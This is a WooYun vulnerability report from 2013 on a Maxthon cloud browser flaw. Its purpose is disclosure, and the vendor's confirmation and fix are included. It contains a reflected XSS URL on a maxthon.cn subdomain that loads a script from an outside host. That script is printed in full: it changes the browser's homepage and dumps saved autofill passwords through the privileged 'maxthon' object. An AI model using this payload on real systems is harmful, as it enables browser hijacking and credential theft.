当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033365

漏洞标题:傲游云浏览器漏洞造成可以远程控制浏览器

相关厂商:傲游

漏洞作者: 心伤的胖子

提交时间:2013-08-03 08:21

修复时间:2013-11-01 08:22

公开时间:2013-11-01 08:22

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-03: 细节已通知厂商并且等待厂商处理中
2013-08-05: 厂商已经确认,细节仅向厂商公开
2013-08-08: 细节向第三方安全合作伙伴开放
2013-09-29: 细节向核心白帽子及相关领域专家公开
2013-10-09: 细节向普通白帽子公开
2013-10-19: 细节向实习白帽子公开
2013-11-01: 细节向公众公开

简要描述:

傲游云浏览器漏洞造成可以远程修改浏览器的设计,以及获取浏览器的数据,达到控制浏览器的目的。

详细说明:

测试版本:v4.1.0.4000
傲游浏览器设置功能是通过 html 代码实现的,通过查看页面属性为:mx://res/options/index.htm,获取设置操作相关的代码就有机会控制浏览器。
查看源代码发现相关的 js 代码都在下面两个文件中:
mx://res/base/js/ext/mx.config.js
mx://res/options/js/all.js
对 js 代码分析发现所有的操作都在 maxthon 这个对象里面,在控制台里面查看下,如下图(对于文件操作、命令执行等高危函数不知道是做了限制还是给去掉了?):

mx1.png


结合 all.js 中的内容就可以写出修改浏览器设置的代码,以及获取浏览器历史纪录、自动表单填充中的密码等,但是要想完全控制浏览器就需要想办法让浏览器执行我们的代码,可以直接在其他域下放入相关代码是不行的,权限不够。如果 maxthon.cn 域是不是有权限呢,经过测试是可以的,如下图:

mx2.png


mx3.png


那只要在 maxthon.cn 任意一个域下找个 xss 就可以了,那么来了:
http://mm.maxthon.cn/feedback/feedback-list.php?deviceid=xxx&lang=x"><script src=http://www.a.com/mx.js?></script>
PS:貌似国内好多做浏览器的都没有考虑 xss 过滤器
http://www.a.com/mx.js 的代码为:

//修改主页
function bK(w, bR) {
maxthon.browser.config.ConfigManager.set("maxthon.config", w, bR);
}
bK("browser.general.startpage","http://www.baidu.com/");
//获取自动表单填充用户密码
var str = "";
var forms = eval("(function(){return " + maxthon.browser.MagicFillService.getSavedPasswords() + ";})()");
for(form in forms){
str = "url: " + forms[form]["form"]["origin"] + " | user: " + forms[form]["form"]["user_name_value"] + " | passwd: " + maxthon.browser.MagicFillService.showSavedPassword(forms[form]["form"]["password_value"]) + "\n" + str;
}
alert(str);


如下图:

mx4.png

漏洞证明:

如下图:

mx4.png

修复方案:

1、*.maxthon.cn 只要有 xss 就可以,可是怎么修的完?

版权声明:转载请注明来源 心伤的胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-08-05 07:50

厂商回复:

感谢报告, 正在调整策略.

最新状态:

2013-08-13:站点已调整权限. 客户端部分修复.

2013-09-06:已修复. 谢谢帮助.